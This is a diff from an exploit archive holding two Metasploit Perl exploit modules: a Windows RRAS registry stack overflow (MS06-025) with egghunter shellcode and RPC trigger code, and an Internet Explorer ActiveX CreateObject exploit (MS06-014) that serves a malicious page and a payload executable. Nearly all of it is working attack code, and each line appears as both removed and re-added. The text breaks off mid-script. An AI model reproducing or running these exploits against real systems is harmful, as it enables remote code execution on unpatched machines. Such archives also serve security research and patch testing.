-	'UserOpts' =>
+	  {
-	  {
+		'RHOST' => [ 1, 'ADDR', 'The target address' ],
-		'RHOST' => [ 1, 'ADDR', 'The target address' ],
+
-
+		# SMB connection options
-		# SMB connection options
+		'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
-		'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
+		'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username',''],
-		'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username',''],
+		'SMBDOM'  => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
-		'SMBDOM'  => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
+		'SMBPIPE' => [ 1, 'DATA', 'The pipe name to use (2000=ROUTER, XP=SRVSVC)', 'ROUTER' ],
-		'SMBPIPE' => [ 1, 'DATA', 'The pipe name to use (2000=ROUTER, XP=SRVSVC)', 'ROUTER' ],
+	  },
-	  },
+
-
+	'Payload' =>
-	'Payload' =>
+	  {
-	  {
+		'Space'    =>1024,
-		'Space'    =>1024,
+		'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24",
-		'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24",
+
-
+		# sub esp, 4097 + inc esp makes stack happy
-		# sub esp, 4097 + inc esp makes stack happy
+		'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
-		'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
+	  },
-	  },
+
-
+	'Description' => Pex::Text::Freeform(
-	'Description' => Pex::Text::Freeform(
+		qq{
-		qq{
+    		This module exploits a registry-based stack overflow in the Windows Routing 
-    		This module exploits a registry-based stack overflow in the Windows Routing 
+			and Remote Access Service. Since the service is hosted inside svchost.exe, 
-			and Remote Access Service. Since the service is hosted inside svchost.exe, 
+			a failed exploit attempt can cause other system services to fail as well. 
-			a failed exploit attempt can cause other system services to fail as well. 
+			A valid username and password is required to exploit this flaw on Windows 2000. 
-			A valid username and password is required to exploit this flaw on Windows 2000. 
+			When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
-			When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
+			Exploiting this flaw involves two distinct steps - creating the registry key
-			Exploiting this flaw involves two distinct steps - creating the registry key
+			and then triggering an overwrite based on a read of this key. Once the key is
-			and then triggering an overwrite based on a read of this key. Once the key is
+			created, it cannot be recreated. This means that for any given system, you
-			created, it cannot be recreated. This means that for any given system, you
+			only get one chance to exploit this flaw. Picking the wrong target will require
-			only get one chance to exploit this flaw. Picking the wrong target will require
+			a manual removal of the following registry key before you can try again:
-			a manual removal of the following registry key before you can try again:
+			HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook
-			HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook
+}
-}
+	  ),
-	  ),
+
-
+	'Refs' =>
-	'Refs' =>
+	  [
-	  [
+		[ 'BID', '18325' ],
-		[ 'BID', '18325' ],
+		[ 'CVE', '2006-2370' ],
-		[ 'CVE', '2006-2370' ],
+		[ 'OSVDB', '26437' ],
-		[ 'OSVDB', '26437' ],
+		[ 'MSB', 'MS06-025' ]
-		[ 'MSB', 'MS06-025' ]
+	  ],
-	  ],
+
-
+	'DefaultTarget' => 0,
-	'DefaultTarget' => 0,
+	'Targets'       =>
-	'Targets'       =>
+	  [
-	  [
+		[ 'Automatic' ],
-		[ 'Automatic' ],
+		[ 'Windows 2000',   0x750217ae ], # call esi
-		[ 'Windows 2000',   0x750217ae ], # call esi
+	  ],
-	  ],
+
-
+	'Keys' => ['rras'],
-	'Keys' => ['rras'],
+
-
+	'DisclosureDate' => 'Jun 13 2006',
-	'DisclosureDate' => 'Jun 13 2006',
+  };
-  };
+
-
+sub new {
-sub new {
+	my ($class) = @_;
-	my ($class) = @_;
+	my $self    = $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
-	my $self    = $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
+	return ($self);
-	return ($self);
+}
-}
+
-
+sub Exploit {
-sub Exploit {
+	my ($self)      = @_;
-	my ($self)      = @_;
+	my $target_host = $self->GetVar('RHOST');
-	my $target_host = $self->GetVar('RHOST');
+	my $target_port = $self->GetVar('RPORT');
-	my $target_port = $self->GetVar('RPORT');
+	my $target_idx  = $self->GetVar('TARGET');
-	my $target_idx  = $self->GetVar('TARGET');
+	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
-	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
+	my $target      = $self->Targets->[$target_idx];
-	my $target      = $self->Targets->[$target_idx];
+
-
+	my $FragSize = $self->GetVar('FragSize') || 256;
-	my $FragSize = $self->GetVar('FragSize') || 256;
+	my $target   = $self->Targets->[$target_idx];
-	my $target   = $self->Targets->[$target_idx];
+
-
+	my ( $res, $rpc );
-	my ( $res, $rpc );
+
-
+	my $pipe    = "\\" . $self->GetVar("SMBPIPE");
-	my $pipe    = "\\" . $self->GetVar("SMBPIPE");
+	my $uuid    = '20610036-fa22-11cf-9823-00a0c911e5df';
-	my $uuid    = '20610036-fa22-11cf-9823-00a0c911e5df';
+	my $version = '1.0';
-	my $version = '1.0';
+
-
+	my $handle =
-	my $handle =
+	  Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host,
-	  Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host,
+		$pipe );
-		$pipe );
+
-
+	my $dce = Pex::DCERPC->new(
-	my $dce = Pex::DCERPC->new(
+		'handle'      => $handle,
-		'handle'      => $handle,
+		'username'    => $self->GetVar('SMBUSER'),
-		'username'    => $self->GetVar('SMBUSER'),
+		'password'    => $self->GetVar('SMBPASS'),
-		'password'    => $self->GetVar('SMBPASS'),
+		'domain'      => $self->GetVar('SMBDOM'),
-		'domain'      => $self->GetVar('SMBDOM'),
+		'fragsize'    => $self->GetVar('FragSize'),
-		'fragsize'    => $self->GetVar('FragSize'),
+		'bindevasion' => $self->GetVar('BindEvasion'),
-		'bindevasion' => $self->GetVar('BindEvasion'),
+		'directsmb'   => $self->GetVar('DirectSMB'),
-		'directsmb'   => $self->GetVar('DirectSMB'),
+	  );
-	  );
+
-
+	if ( !$dce ) {
-	if ( !$dce ) {
+		$self->PrintLine("[*] Could not bind to $handle");
-		$self->PrintLine("[*] Could not bind to $handle");
+		return;
-		return;
+	}
-	}
+
-
+	my $smb = $dce->{'_handles'}{$handle}{'connection'};
-	my $smb = $dce->{'_handles'}{$handle}{'connection'};
+	if ( $target->[0] =~ /Auto/ ) {
-	if ( $target->[0] =~ /Auto/ ) {
+		if ( $smb->PeerNativeOS eq 'Windows 5.0' ) {
-		if ( $smb->PeerNativeOS eq 'Windows 5.0' ) {
+			$target = $self->Targets->[1];
-			$target = $self->Targets->[1];
+			$self->PrintLine('[*] Detected a Windows 2000 target...');
-			$self->PrintLine('[*] Detected a Windows 2000 target...');
+		}
-		}
+		#elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) {
-		#elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) {
+		#	$target = $self->Targets->[2];
-		#	$target = $self->Targets->[2];
+		#	$self->PrintLine('[*] Detected a Windows XP target...');
-		#	$self->PrintLine('[*] Detected a Windows XP target...');
+		#}
-		#}
+		else {
-		else {
+			$self->PrintLine( '[*] No target available : ' . $smb->PeerNativeOS() );
-			$self->PrintLine( '[*] No target available : ' . $smb->PeerNativeOS() );
+			return;
-			return;
+		}
-		}
+	}
-	}
+
-
+	# Shiny new egghunt from the 3.0 code :-)
-	# Shiny new egghunt from the 3.0 code :-)
+	my $egghunt =
-	my $egghunt =
+	  "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02" .
-	  "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02" .
+	  "\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" .
-	  "\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" .
+	  "\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41".
+	  "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";
-	  "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";
+
-
+	# Pick a "filler" character that we know doesn't get mangled
-	# Pick a "filler" character that we know doesn't get mangled
+	# by the wide string conversion routines
-	# by the wide string conversion routines
+	my $fillset = "\xc1\xff\x67\x1b\xd3\xa3\xe7";
-	my $fillset = "\xc1\xff\x67\x1b\xd3\xa3\xe7";
+	my $filler  = substr($fillset, rand(length($fillset)), 1);
-	my $filler  = substr($fillset, rand(length($fillset)), 1);
+	my $eggtag  = '';
-	my $eggtag  = '';
+	my $pattern = '';
-	my $pattern = '';
+
-
+	while (length($eggtag) < 4) {
-	while (length($eggtag) < 4) {
+		$eggtag .= substr($fillset, rand(length($fillset)), 1);
-		$eggtag .= substr($fillset, rand(length($fillset)), 1);
+	}
-	}
+
-
+	# Configure the egg
-	# Configure the egg
+	substr($egghunt, 0x12, 4, $eggtag);
-	substr($egghunt, 0x12, 4, $eggtag);
+
-
+	# We use an egghunter to give us nearly unlimited room for shellcode
-	# We use an egghunter to give us nearly unlimited room for shellcode
+	my $eggdata =
-	my $eggdata =
+	  ($filler x 1024).
-	  ($filler x 1024).
+	  $eggtag.
-	  $eggtag.
+	  $eggtag.
-	  $eggtag.
+	  $shellcode.
-	  $shellcode.
+	  ($filler x 1024);
-	  ($filler x 1024);
+
-
+	# Mini-payload that launches the egghunt
-	# Mini-payload that launches the egghunt
+	my $bof = $filler x 178;
-	my $bof = $filler x 178;
+	substr($bof, 84, length($egghunt), $egghunt);
-	substr($bof, 84, length($egghunt), $egghunt);
+
-
+	# Base pointer override occurs with this string
-	# Base pointer override occurs with this string
+	my $pat =
-	my $pat =
+	  ($filler x 886).
-	  ($filler x 886).
+	  pack('V', $target->[1]).
-	  pack('V', $target->[1]).
+	  ($filler x 3). "\xc0".
-	  ($filler x 3). "\xc0".
+	  $bof;
-	  $bof;
+
-
+	# The vulnerability is triggered with the second field of this structure
-	# The vulnerability is triggered with the second field of this structure
+	my $type2 =
-	my $type2 =
+	  Pex::NDR::UnicodeConformantVaryingStringPreBuilt( ($filler x 1024) . "\x00" ).
-	  Pex::NDR::UnicodeConformantVaryingStringPreBuilt( ($filler x 1024) . "\x00" ).
+	  Pex::NDR::UnicodeConformantVaryingStringPreBuilt( $pat . "\x00" ).
-	  Pex::NDR::UnicodeConformantVaryingStringPreBuilt( $pat . "\x00" ).
+	  Pex::NDR::UnicodeConformantVaryingStringPreBuilt( ($filler x 4096) . "\x00" ).
-	  Pex::NDR::UnicodeConformantVaryingStringPreBuilt( ($filler x 4096) . "\x00" ).
+	  Pex::NDR::Long( int(rand(0xffffffff)) ).
-	  Pex::NDR::Long( int(rand(0xffffffff)) ).
+	  Pex::NDR::Long( int(rand(0xffffffff)) );
-	  Pex::NDR::Long( int(rand(0xffffffff)) );
+
-
+	# Another gigantic structure, many of these fields up as registry values
-	# Another gigantic structure, many of these fields up as registry values
+	my $type1 =
-	my $type1 =
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # OperatorDial
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # OperatorDial
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # PreviewPhoneNumber
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # PreviewPhoneNumber
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # UseLocation
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # UseLocation
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # ShowLights
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # ShowLights
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # ShowConnectStatus
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # ShowConnectStatus
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # CloseOnDial
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # CloseOnDial
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # AllowLogonPhonebookEdits
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # AllowLogonPhonebookEdits
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # AllowLogonLocationEdits
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # AllowLogonLocationEdits
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # SkipConnectComplete
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # SkipConnectComplete
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # NewEntryWizard
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # NewEntryWizard
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # RedialAttempts
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # RedialAttempts
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # RedialSeconds
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # RedialSeconds
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # IdleHangUpSeconds
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # IdleHangUpSeconds
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # RedialOnLinkFailure
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # RedialOnLinkFailure
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # PopupOnTopWhenRedialing
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # PopupOnTopWhenRedialing
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # ExpandAutoDialQuery
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # ExpandAutoDialQuery
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # CallbackMode
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # CallbackMode
+	  Pex::NDR::Long(0x45).
-	  Pex::NDR::Long(0x45).
+	  $type2.
-	  $type2.
+	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 129).
-	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 129).
+	  Pex::NDR::Long(int(rand(0xffffffff))).
-	  Pex::NDR::Long(int(rand(0xffffffff))).
+	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 520).
-	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 520).
+	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 520).
-	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 520).
+	  Pex::NDR::Long(int(rand(0xffffffff))).
-	  Pex::NDR::Long(int(rand(0xffffffff))).
+	  Pex::NDR::Long(int(rand(0xffffffff))).
-	  Pex::NDR::Long(int(rand(0xffffffff))).
+	  Pex::NDR::Long(int(rand(0xffffffff))).
-	  Pex::NDR::Long(int(rand(0xffffffff))).
+	  Pex::NDR::Long(int(rand(0xffffffff))).
-	  Pex::NDR::Long(int(rand(0xffffffff))).
+	  Pex::NDR::Long(int(rand(0xffffffff))).
-	  Pex::NDR::Long(int(rand(0xffffffff))).
+	  Pex::NDR::Long(int(rand(0xffffffff))).
-	  Pex::NDR::Long(int(rand(0xffffffff))).
+	  Pex::NDR::Long(int(rand(0xffffffff))).
-	  Pex::NDR::Long(int(rand(0xffffffff))).
+	  Pex::NDR::Long(int(rand(0xffffffff))).
-	  Pex::NDR::Long(int(rand(0xffffffff))).
+	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 514).
-	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 514).
+	  Pex::NDR::Long(int(rand(0xffffffff))).
-	  Pex::NDR::Long(int(rand(0xffffffff))).
+	  Pex::NDR::Long(int(rand(0xffffffff)));
-	  Pex::NDR::Long(int(rand(0xffffffff)));
+
-
+	# Create the actual RPC stub and tack our payload on the end
-	# Create the actual RPC stub and tack our payload on the end
+	my $stub =
-	my $stub =
+	  $type1.
-	  $type1.
+	  Pex::NDR::Long(int(rand(0xffffffff))).
-	  Pex::NDR::Long(int(rand(0xffffffff))).
+	  $eggdata;
-	  $eggdata;
+
-
+	$self->PrintLine("[*] Creating the malicious registry key...");
-	$self->PrintLine("[*] Creating the malicious registry key...");
+	my @response = $dce->request( $handle, 0x0A, $stub );
-	my @response = $dce->request( $handle, 0x0A, $stub );
+
-
+	$self->PrintLine("[*] Triggering the base pointer overwrite...");
-	$self->PrintLine("[*] Triggering the base pointer overwrite...");
+	my @response = $dce->request( $handle, 0x0A, $stub );
-	my @response = $dce->request( $handle, 0x0A, $stub );
+
-
+	if (@response) {
-	if (@response) {
+		$self->PrintLine('[*] RPC server responded with:');
-		$self->PrintLine('[*] RPC server responded with:');
+		foreach my $line (@response) {
-		foreach my $line (@response) {
+			$self->PrintLine( '[*] ' . $line );
-			$self->PrintLine( '[*] ' . $line );
+		}
-		}
+		$self->PrintLine('[*] This probably means that the system is patched');
-		$self->PrintLine('[*] This probably means that the system is patched');
+	}
-	}
+	return;
-	return;
+}
-}
+
-
+1;
-1;
+
-
+# milw0rm.com [2006-06-29]
 # milw0rm.com [2006-06-29]
--- a/platforms/windows/remote/2164.pm
+++ b/platforms/windows/remote/2164.pm
@ -1,354 +1,354 @@
-##
+##
-# This file is part of the Metasploit Framework and may be redistributed
+# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
+# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
+# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
+# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
+# version of the Framework can always be obtained from metasploit.com.
-##
+##
-
+
-package Msf::Exploit::ie_createobject;
+package Msf::Exploit::ie_createobject;
-
+
-use strict;
+use strict;
-use base "Msf::Exploit";
+use base "Msf::Exploit";
-use Pex::Text;
+use Pex::Text;
-use IO::Socket::INET;
+use IO::Socket::INET;
-use IPC::Open3;
+use IPC::Open3;
-
+
-my $advanced =
+my $advanced =
-  {
+  {
-	'Gzip'       => [1, 'Enable gzip content encoding'],
+	'Gzip'       => [1, 'Enable gzip content encoding'],
-	'Chunked'    => [1, 'Enable chunked transfer encoding'],
+	'Chunked'    => [1, 'Enable chunked transfer encoding'],
-  };
+  };
-
+
-my $info =
+my $info =
-  {
+  {
-	'Name'           => 'Internet Explorer COM CreateObject Code Execution',
+	'Name'           => 'Internet Explorer COM CreateObject Code Execution',
-	'Version'        => '$Revision: 3753 $',
+	'Version'        => '$Revision: 3753 $',
-	'Authors'        =>
+	'Authors'        =>
-	  [
+	  [
-		'H D Moore <hdm [at] metasploit.com>',
+		'H D Moore <hdm [at] metasploit.com>',
-	  ],
+	  ],
-
+
-	'Description'    =>
+	'Description'    =>
-	  Pex::Text::Freeform(qq{
+	  Pex::Text::Freeform(qq{
-		This module exploits a generic code execution vulnerability in Internet 
+		This module exploits a generic code execution vulnerability in Internet 
-		Explorer by abusing vulnerable ActiveX objects. 
+		Explorer by abusing vulnerable ActiveX objects. 
-}),
+}),
-
+
-	'Arch'           => [ 'x86' ],
+	'Arch'           => [ 'x86' ],
-	'OS'             => [ 'win32', 'winxp', 'win2003' ],
+	'OS'             => [ 'win32', 'winxp', 'win2003' ],
-	'Priv'           => 0,
+	'Priv'           => 0,
-
+
-	'UserOpts'       =>
+	'UserOpts'       =>
-	  {
+	  {
-		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
+		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
-		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
+		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
-	  },
+	  },
-
+
-	'Payload'        =>
+	'Payload'        =>
-	  {
+	  {
-		'Space'    => 4000,
+		'Space'    => 4000,
-		'Keys'     => ['-bind'],
+		'Keys'     => ['-bind'],
-	  },
+	  },
-	'Refs'           =>
+	'Refs'           =>
-	  [
+	  [
-		['MSB', 'MS06-014']
+		['MSB', 'MS06-014']
-	  ],
+	  ],
-
+
-	'DefaultTarget'  => 0,
+	'DefaultTarget'  => 0,
-	'Targets'        =>
+	'Targets'        =>
-	  [
+	  [
-	  	[ 'Automatic' ],
+	  	[ 'Automatic' ],
-
+
-		# Patched
+		# Patched
-		[ 'MS06-014 - RDS.DataControl', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'],
+		[ 'MS06-014 - RDS.DataControl', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'],
-
+
-		# Not marked as safe
+		# Not marked as safe
-		[ 'UNKNOWN  - RDS.DataSpace', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'],
+		[ 'UNKNOWN  - RDS.DataSpace', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'],
-
+
-		# Not marked as safe
+		# Not marked as safe
-		[ 'UNKNOWN  - Business Object Factory ', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'],
+		[ 'UNKNOWN  - Business Object Factory ', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'],
-		
+		
-		# Not marked as safe
+		# Not marked as safe
-		[ 'UNKNOWN  - Outlook Data Object', '{0006F033-0000-0000-C000-000000000046}'],
+		[ 'UNKNOWN  - Outlook Data Object', '{0006F033-0000-0000-C000-000000000046}'],
-
+
-		# Found exploitable in the wild (no details)
+		# Found exploitable in the wild (no details)
-		[ 'UNKNOWN  - Outlook.Application', '{0006F03A-0000-0000-C000-000000000046}'],
+		[ 'UNKNOWN  - Outlook.Application', '{0006F03A-0000-0000-C000-000000000046}'],
-
+
-		# These are restricted by site (might be exploitable via DNS spoofing + SSL fun)
+		# These are restricted by site (might be exploitable via DNS spoofing + SSL fun)
-		[ 'UNKNOWN  - SoftwareDistribution.MicrosoftUpdateWebControl.1', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'],
+		[ 'UNKNOWN  - SoftwareDistribution.MicrosoftUpdateWebControl.1', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'],
-		[ 'UNKNOWN  - SoftwareDistribution.WebControl.1', '{6414512B-B978-451D-A0D8-FCFDF33E833C}'],
+		[ 'UNKNOWN  - SoftwareDistribution.WebControl.1', '{6414512B-B978-451D-A0D8-FCFDF33E833C}'],
-
+
-		# Part of the WMI SDK, currently unpatched/unreported
+		# Part of the WMI SDK, currently unpatched/unreported
-		[ 'UNKNOWN  - WMIScriptUtils.WMIObjectBroker2.1', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'],
+		[ 'UNKNOWN  - WMIScriptUtils.WMIObjectBroker2.1', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'],
-		
+		
-		# Visual Studio components, not marked as safe
+		# Visual Studio components, not marked as safe
-		[ 'UNKNOWN  - VsmIDE.DTE', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'],
+		[ 'UNKNOWN  - VsmIDE.DTE', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'],
-		[ 'UNKNOWN  - DExplore.AppObj.8.0', '{639F725F-1B2D-4831-A9FD-874847682010}'],
+		[ 'UNKNOWN  - DExplore.AppObj.8.0', '{639F725F-1B2D-4831-A9FD-874847682010}'],
-		[ 'UNKNOWN  - VisualStudio.DTE.8.0', '{BA018599-1DB3-44f9-83B4-461454C84BF8}'],
+		[ 'UNKNOWN  - VisualStudio.DTE.8.0', '{BA018599-1DB3-44f9-83B4-461454C84BF8}'],
-		[ 'UNKNOWN  - Microsoft.DbgClr.DTE.8.0', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'],
+		[ 'UNKNOWN  - Microsoft.DbgClr.DTE.8.0', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'],
-		[ 'UNKNOWN  - VsaIDE.DTE', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'],			
+		[ 'UNKNOWN  - VsaIDE.DTE', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'],			
-	  ],
+	  ],
-
+
-	'Keys'           => [ 'ie' ],
+	'Keys'           => [ 'ie' ],
-
+
-	'DisclosureDate' => '',
+	'DisclosureDate' => '',
-  };
+  };
-
+
-sub new {
+sub new {
-	my $class = shift;
+	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-	return($self);
+	return($self);
-}
+}
-
+
-sub Exploit
+sub Exploit
-{
+{
-	my $self = shift;
+	my $self = shift;
-
+
-	my $server = IO::Socket::INET->new(
+	my $server = IO::Socket::INET->new(
-		LocalHost => $self->GetVar('HTTPHOST'),
+		LocalHost => $self->GetVar('HTTPHOST'),
-		LocalPort => $self->GetVar('HTTPPORT'),
+		LocalPort => $self->GetVar('HTTPPORT'),
-		ReuseAddr => 1,
+		ReuseAddr => 1,
-		Listen    => 1,
+		Listen    => 1,
-		Proto     => 'tcp'
+		Proto     => 'tcp'
-	  );
+	  );
-	my $client;
+	my $client;
-
+
-	# Did the listener create fail?
+	# Did the listener create fail?
-	if (not defined($server)) {
+	if (not defined($server)) {
-		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
+		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
-		return;
+		return;
-	}
+	}
-
+
-	my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
+	my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
-	  Pex::Utils::SourceIP('1.2.3.4') :
+	  Pex::Utils::SourceIP('1.2.3.4') :
-	  $self->GetVar('HTTPHOST');
+	  $self->GetVar('HTTPHOST');
-
+
-	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");
+	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");
-
+
-	while (defined($client = $server->accept())) {
+	while (defined($client = $server->accept())) {
-		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
+		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
-	}
+	}
-
+
-	return;
+	return;
-}
+}
-
+
-sub HandleHttpClient
+sub HandleHttpClient
-{
+{
-	my $self      = shift;
+	my $self      = shift;
-	my $fd        = shift;
+	my $fd        = shift;
-	my $shellcode = my $shellcode = $self->GetVar('EncodedPayload')->Payload;
+	my $shellcode = my $shellcode = $self->GetVar('EncodedPayload')->Payload;
-	 
+	 
-	# Set the remote host information
+	# Set the remote host information
-	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
+	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
-
+
-	# Read the HTTP command
+	# Read the HTTP command
-	my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);
+	my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);
-
+
-	# Read the HTTP headers
+	# Read the HTTP headers
-	my $headers;
+	my $headers;
-	while ( (my $line = $fd->RecvLine(10))) {
+	while ( (my $line = $fd->RecvLine(10))) {
-		$headers .= $line;
+		$headers .= $line;
-		last if $line eq "\r\n";
+		last if $line eq "\r\n";
-	}
+	}
-
+
-	if ($url =~ /\?payload/) {
+	if ($url =~ /\?payload/) {
-		$self->PrintLine("[*] HTTP Client $rhost:$rport asked for payload...");
+		$self->PrintLine("[*] HTTP Client $rhost:$rport asked for payload...");
-		my $content = Pex::Utils::CreateWin32PE($shellcode, 'ie_createobject');
+		my $content = Pex::Utils::CreateWin32PE($shellcode, 'ie_createobject');
-		$fd->Send($self->BuildResponse($content, 'application/octet-stream'));
+		$fd->Send($self->BuildResponse($content, 'application/octet-stream'));
-		$fd->Close;
+		$fd->Close;
-		return;
+		return;
-	}
+	}
-	$self->PrintLine("[*] HTTP Client $rhost:$rport asked for exploit page...");
+	$self->PrintLine("[*] HTTP Client $rhost:$rport asked for exploit page...");
-	$fd->Send($self->BuildResponse($self->GenerateHTML(), 'text/html'));
+	$fd->Send($self->BuildResponse($self->GenerateHTML(), 'text/html'));
-	$fd->Close;
+	$fd->Close;
-	return;
+	return;
-}
+}
-
+
-sub GenerateHTML {
+sub GenerateHTML {
-	my $self       = shift;
+	my $self       = shift;
-	my $target_idx = $self->GetVar('TARGET');
+	my $target_idx = $self->GetVar('TARGET');
-	my $objects    = "";
+	my $objects    = "";
-	
+	
-	if ($target_idx == 0) {
+	if ($target_idx == 0) {
-		foreach my $target (@{ $self->Targets }) {
+		foreach my $target (@{ $self->Targets }) {
-			if ($target->[1]) {
+			if ($target->[1]) {
-				$objects .= "'".$target->[1]."',";
+				$objects .= "'".$target->[1]."',";
-			}
+			}
-		}
+		}
-	} else {
+	} else {
-		my $target = $self->Targets->[$target_idx];
+		my $target = $self->Targets->[$target_idx];
-		$objects .= "'".$target->[1]."',";
+		$objects .= "'".$target->[1]."',";
-	}
+	}
-
+
-	my $data  = 
+	my $data  = 
-qq#
+qq#
-<html><head><title></title>
+<html><head><title></title>
-<script language="javascript">
+<script language="javascript">
-
+
-function Log(m) {
+function Log(m) {
-	var log = document.createElement('p');
+	var log = document.createElement('p');
-	log.innerHTML = m;
+	log.innerHTML = m;
-	document.body.appendChild(log);
+	document.body.appendChild(log);
-	
+	
-}
+}
-
+
-function CreateO(o, n) {
+function CreateO(o, n) {
-	var r = null;
+	var r = null;
-	
+	
-	try { eval('r = o.CreateObject(n)') }catch(e){}
+	try { eval('r = o.CreateObject(n)') }catch(e){}
-	
+	
-	if (! r) {
+	if (! r) {
-		try { eval('r = o.CreateObject(n, "")') }catch(e){}
+		try { eval('r = o.CreateObject(n, "")') }catch(e){}
-	}
+	}
-	
+	
-	if (! r) {
+	if (! r) {
-		try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
+		try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
-	}
+	}
